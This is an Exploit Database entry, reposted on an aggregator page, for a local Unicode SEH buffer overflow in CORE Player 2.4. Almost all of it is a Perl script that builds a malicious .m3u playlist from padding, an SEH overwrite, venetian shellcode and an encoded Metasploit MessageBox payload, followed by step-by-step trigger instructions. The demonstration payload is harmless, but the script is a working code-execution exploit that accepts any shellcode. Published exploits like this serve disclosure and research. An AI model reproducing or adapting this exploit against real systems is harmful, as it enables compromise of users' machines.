CORE MultiMedia Suite 2011 CORE Player 2.4 – ‘.m3u’ Local Buffer Overflow

• Exploit Database
• 10 阅读

• 作者： Rh0
  日期： 2011-03-18
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17001/

• # Exploit: CORE Multimedia Suite 2011 CORE Player 2.4 Unicode SEH Buffer Overflow Exploit (.m3u)
  # Date: 18.03.11
  # Author: Rh0[at]z1p.biz
  # Software Link: http://mjm-soft.zzl.org/CORE_MMS_2011.zip
  # Version: 2.4
  # Tested on: WinXP Pro SP3 EN (VirtualBox)
  
  ## The application does not crash immediately:
  ## Open Core Player, go to FILE->LOAD LIST, load the playlist and
  ## close the program. ==> Reopening it triggers the buffer overflow. <==
  ## Seems that the playlist gets saved under Load.m3l in the
  ## programs directory, and everytime the player is opened, the malicious
  ## playlist triggers the overflow.
  ## To be able to start the player normally, remove the Load.m3l file
  
  print " [*] Core Player 2.4 Unicode SEH Buffer Overflow Exploit [*] \n\n";
  
  $junk = "C:\\";
  $junk .= "A" x 533;		# 536 bytes until nseh overwrite
  $nseh = "\x90\xcf"; 	# becomes nop; add bh,cl (pad)
  $seh = "\x59\x4a";		# pop;pop;ret; unicode compatible, 0x004a0059 @ core player.exe
  
  ## venetian shellcode 
  $vSC = 
  "\x71".			#
  "\x58".			# pop eax (eax should then be 0x0012CC14)
  "\x71".
  "\x5d".			# pop ebp
  "\x71".
  "\xbb\x08\x41". # mov ebx,0x41000800
  "\xf8".			# add al,bh
  "\x71".		
  "\xbb\x04\x41". # mov ebx,0x41000400
  "\xfc".			# add ah,bh		(eax should now point to the payload)
  "\x71".
  "\x50".			# push eax
  "\x71".
  "\xc3";			# return
  
  ## msf MessageBox alpha_mixed + unicode upper
  $payload =
  "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAI".
  "AXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBTIK0IKXNXYT".
  "0L4QJPJPJPJPJPJPJPJPJPJPJPJQ3PCPCPCPCQ3P7PRQIQZQ1PXR0P0Q1P0Q1RKQ1Q1PQP".
  "2Q1PBP2Q2PBP0PBPBQ1Q2PXR0P8Q1Q2CEPJQ9PXPYPXRKPMPKPNP9QBPTQ5CDQ9RDR4RQP".
  "ZRRPOQ2PCPGPEC1PKT9R2Q4PLPKPQQQPPP0PLPKQ3Q6QDPLPLPKR1C6PGRLPLPKPRQVPVQ".
  "XPNRKPCPNPQP0PNRKPVPVQ5QXPPPOQ7C8R2PUPXCCR1Q9PEPQQHR1PKPOQHC1PCR0PNRKR".
  "0RLR1P4PGQDPLPKQ3T5Q7PLPLPKPVP4PQP8PRPXPCP1QHQZPNRKPQPZPTQHPLPKQ3QZPGP".
  "PPCP1PZPKPKQCQ7Q4PQPYPLPKPGQ4PLPKPGT1PZPNQ5C1PIROQFR1PKRPPKPLPNPLPOCDQ".
  "9R0R2QDQ3P7Q9PQQJROPTPMR6QQPOP7PZPKQJPTQ7PKPCPLQ7R4Q7QHQ3Q5PIT1PNRKR0Q".
  "JPVQ4QFQQQJPKPCQFPLPKPVRLPPPKPLPKPQPJQ7RLPGT1PZPKPNRKQFQTPNRKR6QQQJPHP".
  "KP9R2QTQ7R4PGRLPCR1POP3POQ2R4PHPVQ9PNP4PORYQHQUPLPIPIPRQ5P8PNRNR0PNR4P".
  "NPXRLR0PRPMP8PMPOQ9ROPKPOQ9ROPOCIPCCEQFC4PMRKQ3PNQHR8QJPBR2QCPKP7Q5PLR".
  "6Q4QFP2PZQ8PLPNPIROQ9ROPIROPOCIPQR5Q7T8Q5P8PPRLPPRLQ5RPPRQQPQCHR0P3R0P".
  "2R4RNPEP4Q5P8R4P5PCQ3R2PER0T2PLQ8R1PLPGQDQ5QJPNQYPXQVPRCFPKPOQFP5Q7CDP".
  "KP9PKCBQFP0POPKPNPHQ9P2PPPMPMRLPKP7PEPLPGPTPQQ2PICHQ5P1PKPOPKPOPKPOPQT".
  "8Q5P4PRCHPERPPQP0Q3PXPPROQ5P9QDP4PEP5PEP8PRQUPPT8R0T0QBPLPPP1Q9PKPLQ8P".
  "CRLR1P4PVC9PMQIQHRCR1RXR1PHPERPPET0PQP0R2Q8Q3PYR2QDPET0Q5RZPPC8R0T8R0R".
  "PPRPLPPROR0RHPQT4R0C5PERPPPQ5R1RXPRPNR2PIPRC3PPROQBPHQBQUQ3T8R1P0PPPUP".
  "EP8Q3QEQDP2Q5RPQFP3PCR8R2RPPRPLPEP1R0RYR2PHPPROQ3Q2QBQ5PERPR1CHPGPPPEC".
  "JR1P0R0Q3PPP1PIR9PNC8R0PLQFPDPET4PKP9PMP1QDRQPNP2QBPJPCRPQBRSPRT1R6P2Q".
  "9ROPNP0QFR1POP0R6P0PKPOQ3C5Q7CHQ1Q1AA";
  
  open(F,">exploit.m3u");
  $buffer .= $junk.$nseh.$seh.$vSC.$payload;
  print F $buffer;
  close(F);
  
  print " [*] Open Core Player\n";
  print " [*] Load the playlist exploit.m3u \n"; 
  print " [*] Close the program\n";
  print " [*] Reopen it\n";
  print " [*] A Messagebox should pop up.\n\n";
  print " [*] Enter to continue [*] ";
  <>;